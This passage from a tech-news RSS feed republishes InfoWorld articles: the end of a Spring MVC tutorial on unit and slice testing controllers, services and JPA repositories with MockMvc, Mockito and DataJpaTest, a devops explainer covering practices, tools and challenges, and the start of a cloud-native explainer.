   when(widgetService.findById(1L)).thenReturn(Optional.empty());

   // Execute a PUT /coffee/1 with a mismatched version number: 2
   mockMvc.perform(put("/widget/{id}", 1L)
                    .contentType(MediaType.APPLICATION_JSON)
                    .header(HttpHeaders.IF_MATCH, 2)
                    .content("{\"id\": 1, " + 
                             "\"name\":  \"Updated Coffee 1\"}"))

           // Validate that we get 404 Not Found
           .andExpect(status().isNotFound());
}</code></pre>



<p class="wp-block-paragraph">We have three variations:</p>



<ul class="wp-block-list">
<li>A successful update.</li>



<li>A failed update because of a version conflict.</li>



<li>A failed update because the widget was not found.</li>
</ul>



<p class="wp-block-paragraph">In RESTful web services, version management is handled by the entity tag, or<code> eTag</code>. When you retrieve an entity, it has an <code>eTag</code> value. When you want to update the entity, you pass that <code>eTag</code> value in the <code>If-Match</code> HTTP header. If the <code>If-Match</code> header does not match the current <code>eTag</code>, which is the <code>Widget</code> version in our implementation, then the <code>PUT</code> handler returns a 409 Conflict HTTP response code. If you get this error, it means that you need to retrieve the entity again and retry your operation. This way, if two different clients attempt to update the same entity simultaneously, only one will succeed.</p>



<p class="wp-block-paragraph">In the <code>testSuccessfulUpdate() </code>method, we return a <code>Widget</code> with a version of 5 when the <code>WidgetService</code>’s <code>findById()</code> method is called. We then pass an <code>If-Match</code> header value of 5 and then validate that we get a 200 OK HTTP response code and the expected header and body values. In the <code>testUpdateConflict()</code> method, we do the same thing, but we set the <code>If-Match</code> header to 2, which does not match 5, so we validate that we get a 409 Conflict HTTP response code. And finally, in the <code>testUpdateNotFound()</code> method, we configure the <code>WidgetService</code> to return an <code>Optional.empty()</code> when its <code>findById()</code> method is called, so we execute the <code>PUT</code> operation and validate that we get a 404 Not Found HTTP response code.</p>



<h3 class="wp-block-heading">Unit testing DELETE /widget</h3>



<p class="wp-block-paragraph">Finally, here is the source code for our two <code>DELETE /widget</code> tests:</p>



<pre class="wp-block-code"><code>@Test
void testDeleteSuccess() throws Exception {
    // Setup mocked product
    Widget mockWidget = new Widget(1L, "Widget 1", 5);

    // Setup the mocked service
    when(widgetService.findById(1L))
                      .thenReturn(Optional.of(mockWidget));
    doNothing().when(widgetService).deleteById(1L);

    // Execute our DELETE request
    mockMvc.perform(delete("/widget/{id}", 1L))
            .andExpect(status().isOk());
}

@Test
void testDeleteNotFound() throws Exception {
    // Setup the mocked service
    when(widgetService.findById(1L)).thenReturn(Optional.empty());

    // Execute our DELETE request
    mockMvc.perform(delete("/widget/{id}", 1L))
            .andExpect(status().isNotFound());
}</code></pre>



<p class="wp-block-paragraph">The <code>DELETE</code> handler first tries to find the widget by ID and then calls the<code> WidgetService</code>’s <code>deleteById()</code> method. The <code>testDeleteSuccess()</code> method configures the <code>WidgetService</code> to return a mock <code>Widget</code> when the <code>findById()</code> method is called and then configures it to do nothing when the <code>deleteById()</code> method is called. The <code>deleteById()</code> method returns void, so we do not need to mock a response, though we do want to allow the method to be called. We execute the <code>DELETE</code> operation and validate that we receive a 200 OK HTTP response code. The<code> testDeleteNotFound()</code> method configures the <code>WidgetService</code> to return <code>Optional.empty()</code> when its <code>findById()</code> method is called. We execute the <code>DELETE</code> operation and validate that we receive a 404 Not Found HTTP response code.</p>



<p class="wp-block-paragraph">At this point, we have a comprehensive set of tests for all of our controller operations. Let’s continue down our stack and test our service.</p>



<h2 class="wp-block-heading">Unit testing a Spring MVC service</h2>



<p class="wp-block-paragraph">Next, we’ll test a <code>WidgetService</code> class, shown here:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.service;

import java.util.List;
import java.util.Optional;

import com.infoworld.widgetservice.model.Widget;
import com.infoworld.widgetservice.repository.WidgetRepository;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;

@Service
public class WidgetService {
    @Autowired
    private WidgetRepository widgetRepository;

    public List findAll() {
        return widgetRepository.findAll();
    }

    public Optional findById(Long id) {
        return widgetRepository.findById(id);
    }

    public Widget create(Widget widget) {
        widget.setVersion(1);
        return widgetRepository.save(widget);
    }

    public Widget save(Widget widget) {
        return widgetRepository.save(widget);
    }

    public void deleteById(Long id) {
        widgetRepository.deleteById(id);
    }
}</code></pre>



<p class="wp-block-paragraph">The <code>WidgetService</code> is very simple. It autowires in a <code>WidgetRepository</code> and then delegates almost all its functionality to the <code>WidgetRepository</code>. The only business logic it implements is that it sets the <code>Widget</code> version to 1 in the <code>create()</code> method, when it is persisting a new <code>Widget</code> to the database.</p>



<p class="wp-block-paragraph">While Spring supports slice testing for our controller and (as you’ll soon see) our repository, it doesn’t have a slice testing annotation for our service. We could use the <code>@SpringBootTest</code> annotation, but then Spring would load all the controllers, repositories, and any other Spring resources in our application into the Spring application context. We can avoid by using Mockito directly. </p>



<p class="wp-block-paragraph">Here is the source code for the <code>WidgetServiceTest</code> class:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.service;

import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;
import static org.mockito.Mockito.when;

import java.util.Optional;

import com.infoworld.widgetservice.model.Widget;
import com.infoworld.widgetservice.repository.WidgetRepository;

import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.junit.jupiter.MockitoExtension;

@ExtendWith(MockitoExtension.class)
public class WidgetServiceTest {
    @Mock
    private WidgetRepository repository;

    @InjectMocks
    private WidgetService service;

    @Test
    void testFindById() {
        Widget widget = new Widget(1L, "My Widget", 1);
        when(repository.findById(1L)).thenReturn(Optional.of(widget));

        Optional w = service.findById(1L);
        assertTrue(w.isPresent());
        assertEquals(1L, w.get().getId());
        assertEquals("My Widget", w.get().getName());
        assertEquals(1, w.get().getVersion());
    }
}</code></pre>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4009216/advanced-unit-testing-with-junit-5-mockito-and-hamcrest.html">JUnit 5 supports extensions</a> and Mockito has defined a test extension that we can access through the <code>@ExtendWith</code> annotation. This extension allows Mockito to read our class, find objects to mock, and inject mocks into other classes. The <code>WidgetServiceTest </code>tells Mockito to create a mock <code>WidgetRepository</code>, by annotating it with the <code>@Mock</code> annotation, and then to inject that mock into the <code>WidgetService</code>, using the <code>@InjectMocks</code> annotation. The result is that we have a <code>WidgetService</code> that we can test and it will have a mock <code>WidgetRepository</code> that we can configure for our test cases.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/4009216/advanced-unit-testing-with-junit-5-mockito-and-hamcrest.html">Advanced unit testing with JUnit 5, Mockito, and Hamcrest</a>.</strong></p>



<p class="wp-block-paragraph">This is not a comprehensive test, but it should get you started. It has a single method, <code>testFindById()</code>, that demonstrates how to test a service method. It creates a mock <code>Widget</code> instance and then uses the Mockito <code>when()</code> method, just as we used in the controller test, to configure the <code>WidgetRepository</code> to return an <code>Optional</code> of that <code>Widget</code> when its <code>findById()</code> method is called. Then it invokes the <code>WidgetService</code>’s <code>findById()</code> method and validates that the mock <code>Widget</code> is returned.</p>



<h2 class="wp-block-heading">Slice testing a Spring Data JPA repository</h2>



<p class="wp-block-paragraph">Next, we’ll slice test our JPA repository (<code>WidgetRepository.java</code>), shown here:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.repository;

import java.util.List;
import com.infoworld.widgetservice.model.Widget;
import org.springframework.data.jpa.repository.JpaRepository;

public interface WidgetRepository extends JpaRepository {
    List findByName(String name);
}</code></pre>



<p class="wp-block-paragraph">The <code>WidgetRepository</code> is a Spring Data JPA repository, which means that we define the interface and Spring generates the implementation. It extends the <code>JpaRepository</code> interface, which accepts two arguments:</p>



<ul class="wp-block-list">
<li>The type of entity that it persists, namely a <code>Widget</code>.</li>



<li>The type of primary key, which in this case is a <code>Long</code>.</li>
</ul>



<p class="wp-block-paragraph">It generates common CRUD method implementations for us to create, update, delete, and find widgets, and then we can define our own query methods using a specific naming convention. For example, we define a <code>findByName()</code> method that returns a <code>List</code> of <code>Widget</code>s. Because “<code>name</code>” is a field in our <code>Widget</code> entity, Spring will generate a query that finds all widgets with the specified name.</p>



<p class="wp-block-paragraph">Here is our <code>WidgetRepositoryTest</code> class:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.repository;

import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertNull;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

import com.infoworld.widgetservice.model.Widget;

import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
import org.springframework.boot.test.autoconfigure.orm.jpa.TestEntityManager;

@DataJpaTest
public class WidgetRepositoryTest {
    @Autowired
    private TestEntityManager entityManager;

    @Autowired
    private WidgetRepository widgetRepository;

    private final List widgetIds = new ArrayList();
    private final List testWidgets = Arrays.asList(
            new Widget("Widget 1", 1),
            new Widget("Widget 2", 1),
            new Widget("Widget 3", 1)
    );

    @BeforeEach
    void setup() {
        testWidgets.forEach(widget -&gt; {
            entityManager.persist(widget);
            widgetIds.add((Long)entityManager.getId(widget));
        });
        entityManager.flush();
    }

    @AfterEach
    void teardown() {
        widgetIds.forEach(id -&gt; {
            Widget widget = entityManager.find(Widget.class, id);
            if (widget != null) {
                entityManager.remove(widget);
            }
        });
        widgetIds.clear();
    }

    @Test
    void testFindAll() {
        List widgetList = widgetRepository.findAll();
        assertEquals(3, widgetList.size());
    }

    @Test
    void testFindById() {
        Widget widget = widgetRepository.findById(
                               widgetIds.getFirst()).orElse(null);

        assertNotNull(widget);
        assertEquals(widgetIds.getFirst(), widget.getId());
        assertEquals("Widget 1", widget.getName());
        assertEquals(1, widget.getVersion());
    }

    @Test
    void testFindByIdNotFound() {
        Widget widget = widgetRepository.findById(
            widgetIds.getFirst() + testWidgets.size()).orElse(null);
        assertNull(widget);
    }

    @Test
    void testCreateWidget() {
        Widget widget = new Widget("New Widget", 1);
        Widget insertedWidget = widgetRepository.save(widget);

        assertNotNull(insertedWidget);
        assertEquals("New Widget", insertedWidget.getName());
        assertEquals(1, insertedWidget.getVersion());
        widgetIds.add(insertedWidget.getId());
    }

    @Test
    void testFindByName() {
        List found = widgetRepository.findByName("Widget 2");
        assertEquals(1, found.size(), "Expected to find 1 Widget");

        Widget widget = found.getFirst();
        assertEquals("Widget 2", widget.getName());
        assertEquals(1, widget.getVersion());
    }
}</code></pre>



<p class="wp-block-paragraph">The <code>WidgetRepositoryTest</code> class is annotated with the <code>@DataJpaTest</code> annotation, which is a slice-testing annotation that loads repositories and entities into the Spring application context and creates a <code>TestEntityManager</code> that we can autowire into our test class. The <code>TestEntityManager</code> allows us to perform database operations outside of our repository so that we can set up and tear down our test scenarios.</p>



<p class="wp-block-paragraph">In the <code>WidgetRepositoryTest</code> class, we autowire in both our <code>WidgetRepository</code> and <code>TestEntityManager</code>. Then, we define a <code>setup()</code> method that is annotated with JUnit’s <code>@BeforeEach</code> annotation, so it will be executed <em>before</em> each test case runs. Next, we define a <code>teardown()</code> method that is annotated with JUnit’s <code>@AfterEach</code> annotation, so it will be executed <em>after</em> each test completes. The class defines a <code>testWidgets</code> list that contains three test widgets and then the <code>setup()</code> method inserts those into the database using the <code>TestEntityManager</code>’s <code>persist()</code> method. After it inserts each widget, it saves the automatically generated ID so that we can reference it in our tests. Finally, after persisting the widgets, it flushes them to the database by calling the <code>TestEntityManager</code>’s <code>flush()</code> method. The <code>teardown()</code> method iterates over all <code>Widget</code> IDs, finds the <code>Widget</code> using the <code>TestEntityManager</code>’s <code>find()</code> method, and, if it is found, removes it from the database. Finally, it clears the widget ID list so that the<code> setup()</code> method can rebuild it for the next test. (Note that the <code>TestEntityManager</code> removes entities directly; it does not have a <em>remove by ID</em> method, so we first have to find each <code>Widget</code> and then remove them one-by-one.)</p>



<p class="wp-block-paragraph">Even though most of the methods being tested are autogenerated and well tested, I wanted to demonstrate how to write several kinds of tests. The only method that we really need to test is the <code>findByName()</code> method because that is the only custom method we define. For example, if we were to define the method as <code><em>findByNam()</em></code> instead of <code>findByName()</code>, then the method would not work, so it is definitely worth testing.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">Spring provides robust support for testing each layer of a Spring MVC application. In this article, we reviewed how to test controllers, using <a href="https://docs.spring.io/spring-framework/reference/testing/mockmvc.html" data-type="link" data-id="https://docs.spring.io/spring-framework/reference/testing/mockmvc.html">MockMvc</a>; services, using the <a href="https://www.infoworld.com/article/4009216/advanced-unit-testing-with-junit-5-mockito-and-hamcrest.html" data-type="link" data-id="https://www.infoworld.com/article/4009216/advanced-unit-testing-with-junit-5-mockito-and-hamcrest.html">JUnit Mockito extension</a>; and repositories, using the Spring <a href="https://docs.spring.io/spring-boot/api/java/org/springframework/boot/test/autoconfigure/orm/jpa/TestEntityManager.html" data-type="link" data-id="https://docs.spring.io/spring-boot/api/java/org/springframework/boot/test/autoconfigure/orm/jpa/TestEntityManager.html">TestEntityManager</a>. We also reviewed slice testing as a strategy to reduce testing resource utilization and minimize the time required to execute tests. Slice testing is implemented in Spring using the <code>@WebMvcTest</code> and <code>@DataJpaTest</code> annotations. I hope these examples have given you everything you need to feel comfortable writing robust tests for your Spring MVC applications.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is devops? Bringing dev and ops together to build better software]]></title>
<description><![CDATA[A portmanteau of “development” and “operations,” devops emerged as a way of bringing together two previously separate groups responsible for the building and deploying of software.



In the old world, developers (devs) typically wrote code before throwing it over to the system administrators (op...]]></description>
<link>https://tsecurity.de/de/3665673/ai-nachrichten/what-is-devops-bringing-dev-and-ops-together-to-build-better-software/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665673/ai-nachrichten/what-is-devops-bringing-dev-and-ops-together-to-build-better-software/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:38 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A portmanteau of “development” and “operations,” devops emerged as a way of bringing together two previously separate groups responsible for the building and deploying of software.</p>



<p class="wp-block-paragraph">In the old world, developers (devs) typically wrote code before throwing it over to the system administrators (operations, or ops) to deploy and integrate that code. But as the industry shifted towards <a href="https://www.infoworld.com/article/2259475/what-is-agile-methodology-modern-software-development-explained.html">agile development</a> and <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native computing</a>, many organizations reoriented around modern, cloud-native practices in the pursuit of faster, better releases.</p>



<p class="wp-block-paragraph">This required a new way to perform these key functions in a more streamlined, efficient, and cohesive way, one where the old frustrations of disconnected dev and ops functions would be eliminated. With two groups working together, developers can rapidly roll out small code enhancements via <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">continuous integration and delivery</a> rather than spending years on “big bang” product releases.</p>



<p class="wp-block-paragraph">Devops was born at cloud-native companies like Facebook, Netflix, Spotify, and Amazon; but it’s become one of the defining technology industry trends of the past decade, primarily because it bridges so many of the changes that have shaped modern software development.</p>



<p class="wp-block-paragraph">As agile development and cloud-native computing have become ubiquitous, devops has enabled the entire industry to speed up its software development cycles. Thus, devops has now thoroughly infiltrated the enterprise, especially in organizations that rely on software to run their business, such as banks, airlines, and retailers. <a>And it’s spawned a host of other “ops” practices, some of which we’ll touch on here.</a><a href="https://www.infoworld.com/article/2255028/what-is-devops-bringing-dev-and-ops-together-for-better-software.html#_msocom_1">[JF1]</a> </p>



<h2 class="wp-block-heading"><strong>Devops practices</strong></h2>



<p class="wp-block-paragraph">Devops requires a shift in mindset from both sides of the dev and ops divide. Development teams should focus on learning and adopting agile processes, standardizing platforms, and helping drive operational efficiencies. Operations teams must now focus on improving stability and velocity, while also reducing costs by working hand in hand with the developer team.</p>



<p class="wp-block-paragraph">Broadly speaking, these teams need to all speak a common language and there needs to be a shared goal and understanding of each other’s key skills for devops to thrive.</p>



<p class="wp-block-paragraph">More specifically, engineers Damon Edwards and John Willis <a href="https://www.devopsgroup.com/insights/resources/diagrams/all/calms-model-of-devops/">created the CALMS model</a> to bring together what are commonly understood to be the key principles of devops:</p>



<ul class="wp-block-list">
<li>Culture: One that embraces <a href="https://www.infoworld.com/article/2259475/what-is-agile-methodology-modern-software-development-explained.html">agile methodologies</a> and is open to change, constant improvement, and accountability for the end-to-end quality of software.</li>



<li>Automation: Automating away toil is a key goal for any devops team.</li>



<li>Lean: Ensuring the smooth flow of software through key steps as quickly as possible.</li>



<li>Measurement: You can’t improve what you don’t measure. Devops pushes for a culture of constant measurement and feedback that can be used to improve and pivot as required, on the fly.</li>



<li>Sharing: Knowledge sharing across an organization is a key tenet of devops.</li>
</ul>



<p class="wp-block-paragraph">“Who could go back to the old way of trying to figure out how to get your laptop environment looking the same as the production environment? All these things make it so clear that there’s a better way to work. I think it’s very tough to turn back once you’ve done things like continuous integration, like continuous delivery. Once you’ve experienced it, it’s really tough to go back to the old way of doing things,” Kim <a href="https://www.infoworld.com/article/2258333/devops-expert-gene-kim-how-devops-helps-business-meet-challenging-times.html">told InfoWorld</a>.</p>



<h2 class="wp-block-heading"><strong>What is a devops engineer?</strong></h2>



<p class="wp-block-paragraph">Naturally, the emergence of devops has spawned a whole new set of job titles, most prominent of which is the catch-all <a href="https://www.infoworld.com/article/2259407/what-is-a-devops-engineer-and-how-do-you-become-one.html">devops engineer</a>.</p>



<p class="wp-block-paragraph">Generally speaking, this role is the natural evolution of the system administrator — but in a world where developers and ops work in close tandem to deliver better software. This person should have a blend of programming and system administrator skills so that he or she can effectively bridge those two sides of the team.</p>



<p class="wp-block-paragraph">That bridging of the two sides requires strong social skills more than technical. As Kim put it, “one of the most important skills, abilities, traits needed in these pioneering rebellions — using devops to overthrow the ancient powerful order, who are very happy to do things the way they have for 30 to 40 years — are the cross-functional skills to be able to reach across the table to their business counterparts and help solve problems.”</p>



<p class="wp-block-paragraph">This person, or team of people, will also have to be a born optimizer, tasked with continually improving the speed and quality of software delivery from the team, be that through better practices, removing bottlenecks, or applying automation to smooth out software delivery.</p>



<p class="wp-block-paragraph">The good news is that these skills are valuable to the enterprise. <a href="https://www.infoworld.com/article/2263101/devops-salaries-continued-to-rise-during-the-pandemic.html">Salaries for this set of job titles have risen steadily over the years</a>, with 95% of devops practitioners making more than $75,000 a year in salary in 2020 in the United States. In Europe and the UK, where salaries are lower across the board, 71% made more than $50,000 a year in 2020, up from 67% in 2019.</p>



<h2 class="wp-block-heading"><strong>Key devops tools</strong></h2>



<p class="wp-block-paragraph">While devops is at its heart a cultural shift, a set of tools has emerged to help organizations adopt devops practices.</p>



<p class="wp-block-paragraph">This stack typically includes <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a>, configuration management, collaboration, version control, <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">continuous integration and delivery (CI/CD)</a>, deployment automation, testing, and monitoring tools.</p>



<p class="wp-block-paragraph">Here are some of the tools/categories that are increasingly relevant in 2025, and what is changing:</p>



<ul class="wp-block-list">
<li><strong>CI/CD and delivery automation</strong>: Traditional tools like Jenkins remain in many stacks, but newer orchestration tools and CLI-driven or GitOps-centric platforms are growing in importance (e.g. ArgoCD, Flux, Tekton). Also, platforms that integrate more tightly with monitoring, secrets management, drift detection, and policy enforcement are gaining traction.</li>



<li><strong>Security, compliance, and devsecops tooling</strong>: Security tools are increasingly integrated into devops pipelines. Expect to see more use of static analysis (SAST), dynamic testing (DAST), dependency and supply chain scanning (SCA), secret management, and policy as code. The push is toward embedding security earlier and <a href="https://www.infoworld.com/article/3965374/bringing-devops-devsecops-and-mlops-together.html">bridging gaps between dev, security, and machine learning teams</a>. (InfoWorld:)</li>



<li><strong>AI  and automation augmentation</strong>: AI-assisted tools are increasingly part of tooling stacks: auto-suggestions in CI/CD, anomaly detection, predictive scaling, intelligent test suite selection, and more. The hope is that these tools will reduce manual interventions and improve reliability. Tools that are “AI ready”—that is, they integrate well with AI or have mature built-in automation or assistance—increasingly <a href="https://www.infoworld.com/article/4052402/how-to-choose-the-right-ai-agent-development-tools.html">stand out from the pack</a>.</li>
</ul>



<h2 class="wp-block-heading"><strong>Devops challenges</strong></h2>



<p class="wp-block-paragraph">Even as devops becomes more widely adopted, there remain real obstacles that can slow progress or limit impact. One major challenge is the persistent <strong>skills gap</strong>. The modern devops engineer (or team) is expected to master not just source control, CI/CD, and scripting, but also cloud architecture, infrastructure as code, security best practices, observability, and strong cross-team communication. In many organizations these capabilities are uneven: some teams excel, others lag behind. A 2024 survey showed that while 83% of developers report participating in devops activities, <a href="https://www.infoworld.com/article/2337172/most-developers-have-adopted-devops-survey-says.html">using multiple CI/CD tools was correlated with <em>worse</em> performance</a> — a sign that complexity without deep expertise can backfire.</p>



<p class="wp-block-paragraph"><strong>Toolchain fragmentation and complexity </strong>is a related issue. Devops toolchains have sprouted into a sometimes bewildering array of packages and techniques to master: version control, CI build/test, security scanning, artifact management, monitoring, observability, deployment, secret management, and more.</p>



<p class="wp-block-paragraph">The more tools you have, the more difficult it becomes to integrate them cleanly, manage their versions, ensure compatibility, and avoid duplicated effort. Organizations often get stuck with “tool sprawl” — tools chosen by different teams, legacy systems, or overlapping functionalities — which introduce friction, maintenance burden, and sometimes vulnerabilities.</p>



<p class="wp-block-paragraph">Finally, although devops has spread far and wide, there is still <strong>cultural resistance and alignment</strong>. Devops isn’t just about tools and processes; it’s about collaboration, shared responsibility, and continuous feedback. Teams rooted in traditional silos (dev vs ops, or security separate) may <a href="https://www.infoworld.com/article/2337372/10-big-devops-mistakes-and-how-to-avoid-them.html">resist changes to roles and workflows</a>. Leadership support, communication of shared goals, trust, and allowance for continuous learning are all necessary.</p>



<p class="wp-block-paragraph">Many CIOs <a href="https://www.cio.com/article/3552944/6-enterprise-devops-mistakes-to-avoid.html">focus too much on tools or implementation first</a>, rather than organizational culture and behaviors; but without addressing culture, even the best tools or processes may not yield the hoped-for velocity, quality, or reliability. Organizations that succeed here tend to have proactive strategies: dedicated training programs, mentorship, internal “guilds,” pairing junior and senior engineers, and making sure leadership supports ongoing learning rather than one-off bootcamps.</p>



<h2 class="wp-block-heading"><strong>Why do devops?</strong></h2>



<p class="wp-block-paragraph">Whoever you ask will tell you that devops is a major culture shift for organizations, so why go through that pain at all?</p>



<p class="wp-block-paragraph">Devops aims to combine the formerly conflicting aims of developers and system administrators. Under its principles, all software development aims to meet business demands, add functionality, and improve the usability of applications while also ensuring those applications are stable, secure, and reliable. Done right, this improves the velocity and quality of your output, while also improving the lives of those working on these outcomes.</p>



<h2 class="wp-block-heading"><strong>Does devops save money — or add cost?</strong></h2>



<p class="wp-block-paragraph">Devops teams are recognizing that speed and agility are only part of success — unchecked cloud bills and waste undermine long-term sustainability. Waste in devops often comes in the form of “<a href="https://www.infoworld.com/article/4010176/devops-debt-the-hidden-tax-on-innovation.html?utm_source=chatgpt.com">devops</a> debt”— idle cloud capacity, dead code, or false-positive security alerts—which was called a “<a href="https://www.infoworld.com/article/4010176/devops-debt-the-hidden-tax-on-innovation.html">hidden tax on innovation</a>” in recent Java-environment studies.</p>



<p class="wp-block-paragraph"> Embedding <a href="https://www.cio.com/article/3839075/finops-breaks-out-of-the-cloud.html">finops</a> practices can help fight these costs. Teams should <a href="https://www.infoworld.com/article/4013485/how-to-shift-left-on-finops-and-why-you-need-to.html">shift left on cost</a>: estimating costs when spinning up new environments, resizing instances, and scaling down unused resources before they become runaway expenses.</p>



<h2 class="wp-block-heading"><strong>How to start with devops</strong></h2>



<p class="wp-block-paragraph">There are lots of resources for help getting started with devops, <a href="https://www.amazon.com/DevOps-Handbook-World-Class-Reliability-Organizations-ebook/dp/B01M9ASFQ3">including Kim’s own <em>Devops Handbook</em></a>, or you can enlist the help of external consultants. But you have to be methodical and focus on your people more than on the tools and technology you will eventually use <a href="https://www.infoworld.com/article/2258896/6-ways-to-secure-buy-in-for-your-devops-journey.html">if you want to ensure lasting buy-in across the business</a>.</p>



<p class="wp-block-paragraph">A proven route to achieving this is a “land and expand” strategy, where a small group starts by mapping key value streams and identifying a single product team or workload for trialing devops practices. If this team is successful in proving the value of the shift, you will likely start to get interest from other teams and from senior leadership.</p>



<p class="wp-block-paragraph">If you are at the start of your devops journey, however, make sure you are prepared for the disruption a change like this can have on your organization, and keep your eye on the prize of building better, faster, stronger software.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p class="wp-block-paragraph"><a></a></p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph">More on devops:</p>



<ul class="wp-block-list">
<li><a href="https://www.infoworld.com/article/4010176/devops-debt-the-hidden-tax-on-innovation.html">Devops debt: The hidden tax on innovation</a></li>



<li><a href="https://www.infoworld.com/article/2337372/10-big-devops-mistakes-and-how-to-avoid-them.html">10 big devops mistakes and how to avoid them</a></li>



<li><a href="https://www.infoworld.com/article/3621681/smarter-devops-how-to-avoid-deployment-horrors.html">Smarter devops: How to avoid deployment horrors</a><div class="card__info"></div></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloud native explained: How to build scalable, resilient applications]]></title>
<description><![CDATA[What is cloud native? Cloud native defined



The term “cloud-native computing” encompasses the modern approach to building and running software applications that exploit the flexibility, scalability, and resilience of cloud computing. The phrase is a catch-all that encompasses not just the speci...]]></description>
<link>https://tsecurity.de/de/3665670/ai-nachrichten/cloud-native-explained-how-to-build-scalable-resilient-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665670/ai-nachrichten/cloud-native-explained-how-to-build-scalable-resilient-applications/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:33 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading"><strong>What is cloud native? Cloud native defined</strong></h2>



<p class="wp-block-paragraph">The term “cloud-native computing” encompasses the modern approach to building and running software applications that exploit the flexibility, scalability, and resilience of cloud computing. The phrase is a catch-all that encompasses not just the specific architecture choices and environments used to build applications for the public cloud, but also the software engineering techniques and philosophies used by cloud developers.</p>



<p class="wp-block-paragraph">The <a href="https://www.cncf.io/">Cloud Native Computing Foundation</a> (CNCF) is an open source organization that hosts many important cloud-related projects and helps set the tone for the world of cloud development. The CNCF offers its own definition of cloud native:</p>



<p class="wp-block-paragraph"><em>Cloud native practices empower organizations to develop, build, and deploy workloads in computing environments (public, private, hybrid cloud) to meet their organizational needs at scale in a programmatic and repeatable manner. It is characterized by loosely coupled systems that interoperate in a manner that is secure, resilient, manageable, sustainable, and observable.</em></p>



<p class="wp-block-paragraph"><em>Cloud native technologies and architectures typically consist of some combination of containers, service meshes, multi-tenancy, microservices, immutable infrastructure, serverless, and declarative APIs — this list is not exhaustive.</em></p>



<p class="wp-block-paragraph">This definition is a good start, but as cloud infrastructure becomes ubiquitous, the cloud native world is beginning to spread behind the core of this definition. We’ll explore that evolution as well, and look into the near future of cloud-native computing.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<h2 class="wp-block-heading"><strong>Cloud native architectural principles</strong></h2>



<p class="wp-block-paragraph">Let’s start by exploring the pillars of cloud-native architecture. Many of these technologies and techniques were considered innovative and even revolutionary when they hit the market over the past few decades, but now have become widely accepted across the software development landscape.</p>



<p class="wp-block-paragraph"><strong>Microservices. </strong>One of the huge cultural shifts that made cloud-native computing possible was the move from huge, monolithic applications to <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a>: small, loosely coupled, and independently deployable components that work together to form a cloud-native application. These microservices can be scaled across cloud environments, though (as we’ll see in a moment) this makes systems more complex.</p>



<p class="wp-block-paragraph"><strong>Containers and orchestration. </strong>In could-native architectures, individual microservices are executed inside <em>containers </em>— lightweight, portable virtual execution environments that can run on a variety of servers and cloud platforms. Containers insulate the developers from having to worry about the underlying machines on which their code will execute. That is, all they have to do is write to the container environment. </p>



<p class="wp-block-paragraph">Getting the containers to run properly and communicate with one another is where the complexity of cloud native computing starts to emerge. Initially, containers were created and managed by relatively simple platforms, the most common of which was <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a>. But as cloud-native applications got more complex, container orchestration platforms<em> </em>that augmented Docker’s functionality emerged, such as Kubernetes, which allows you to deploy and manage multi-container applications at scale. Kubernetes is critical to cloud native computing as we know it — it’s worth noting that the CNCF was set up as a <a href="https://www.zdnet.com/article/cloud-native-computing-foundation-seeks-to-bring-more-cloud-and-container-unity/">spinoff of the Linux Foundation on the same day that Kubernetes 1.0 was announced</a> — and adhering to <a href="https://www.infoworld.com/article/2338688/6-best-practices-to-keep-kubernetes-costs-under-control.html">Kubernetes best practices</a> is an important key to cloud native success. </p>



